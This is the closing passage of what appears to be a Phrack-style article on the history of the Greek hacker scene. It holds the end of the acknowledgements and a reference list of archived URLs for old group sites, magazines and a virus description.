the fact that some people didn't want to share or have their stories
made public, but nonetheless provided helpful feedback. Thank you guys
too.


----[ References

[GRS] http://phrack.org/issues.html?issue=67&id=16
[ACR] http://www.acrobase.org/
[CPS] http://en.wikipedia.org/wiki/Compupress
[PIX] http://www.f-secure.com/v-descs/pixel.shtml
[GGR] http://www.grhack.gr/ and http://www.grhack.gr/first_page/
[HGR] http://users.hack.gr/
[IUW] http://web.archive.org/web/19990428222240/http://iuworld.vrnet.gr/
[ISE] http://www.isee.gr/issues/01/special/
[TEL] http://www.e-telescope.gr/el/internet-and-computers/
      47-online-journalism
[HMF] http://web.archive.org/web/20011020020500/houmf.org/v0.0/
[HMN] http://web.archive.org/web/20020208000350/
      http://ono-sentai.jp/readkotsanes.php?id=11
[HMT] http://web.archive.org/web/20011212094327/http://houmf.org/v0.0/
      papers.go
[INF] http://web.archive.org/web/20011202184457/http://www.infected.gr/
[UHA] http://web.archive.org/web/20030806115340/http://www.uhagr.org/
[R00] http://web.archive.org/web/20050220152149/
      http://www.r00thell.org/about/
[R0T] http://web.archive.org/web/20050220232518/
      http://www.r00thell.org/papers/
[ROP] http://web.archive.org/web/20031007021404/
      http://r00thell.org/projects.php
[ONO] http://web.archive.org/web/20020330152233/http://ono-sentai.jp/
[ONS] http://web.archive.org/web/20020305052051/
      http://ono-sentai.jp/readkotsanes.php?id=3
[SUB] http://tinyurl.com/882vez7
[CMN] http://web.archive.org/web/20050218172857/
      http://www.ad2u.gr/mirrors/CUT.txt
      http://web.archive.org/web/20050219114701/
      http://www.ad2u.gr/mirrors/toxicity.email
[CUT] http://web.archive.org/web/20050206231527/
      http://www.ad2u.gr/article.php?story=20030105175233835


----[ EOF

Aaand... stop.